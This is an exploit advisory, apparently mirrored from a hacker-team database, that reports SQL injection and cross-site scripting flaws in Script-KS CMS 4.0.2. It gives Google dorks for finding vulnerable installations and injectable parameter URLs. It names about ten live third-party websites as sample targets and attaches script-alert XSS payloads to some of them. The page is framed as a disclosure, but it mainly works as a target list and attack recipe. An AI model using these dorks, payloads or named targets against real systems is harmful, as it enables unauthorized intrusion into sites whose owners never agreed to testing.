Script-KS CMS 4.0.2 Cross Site Scripting / SQL Injection

2012.04.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> Script-KS 4.0.2 - SQL/XSS Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< nuxbie@linuxhacktivist.com >>> CP: +62856-2538-963 [ www.linuxhacktivist.com ] $ YM: nux_exploit - Info WebApps: This CMS Develop By Script-KS: http://script-ks.narod.ru/ - Google Dork: inurl:"/index.php?id_typ=" inurl:"/index.php?id_categ=" - Exploit Concept: http://lokalisasi/WebApps/index.php?id_categ=[SQL Injection] http://lokalisasi/WebApps/index.php?id_typ=[SQL Injection] http://lokalisasi/WebApps/index.php?id_categ=[XSS] http://lokalisasi/WebApps/index.php?id_typ=[XSS] http://lokalisasi/WebApps/index.php?text=[XSS] - Sample Web SQL Injection Vulnerability: http://docka.tomsk.ru/index.php?id_typ=321' + [SQL Injection] http://servistroi.ru/index.php?id_typ=8' + [SQL Injection] http://board.bizua.com.ua/index.php?id_typ=257' + [SQL Injection] http://www.placeanad.ru/index.php?id_typ=254' + [SQL Injection] http://board.arh-info.ru/index.php?id_typ=252' + [SQL Injection] http://kievboard.org.ua/index.php?id_typ=244' + [SQL Injection] http://servistroi.ru/index.php?id_typ=178' + [SQL Injection] http://www.placeanad.ru/index.php?id_typ=347' + [SQL Injection] http://chelbazar.ru/index.php?id_typ=480' + [SQL Injection] http://canadaboard.org.ua/index.php?id_typ=259' + [SQL Injection] , And Many More @ Google...!!! - Sample Web Persistent XSS Vulnerability: http://docka.tomsk.ru/index.php?id_typ=<script>alert(31337);</script> <:- 'XSS' -:> http://servistroi.ru/index.php?id_categ=<script>alert(31337);</script> <:- 'XSS' -:> http://kievboard.org.ua/index.php?text=<script>alert(31337);</script> <:- 'XSS' -:> , And Many More @ Google...!!! -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ######################################################################### - Me @ Solo Raya, 20 April 2012 @ 20:53 PM. [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] #########################################################################

References:

http://script-ks.narod.ru/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top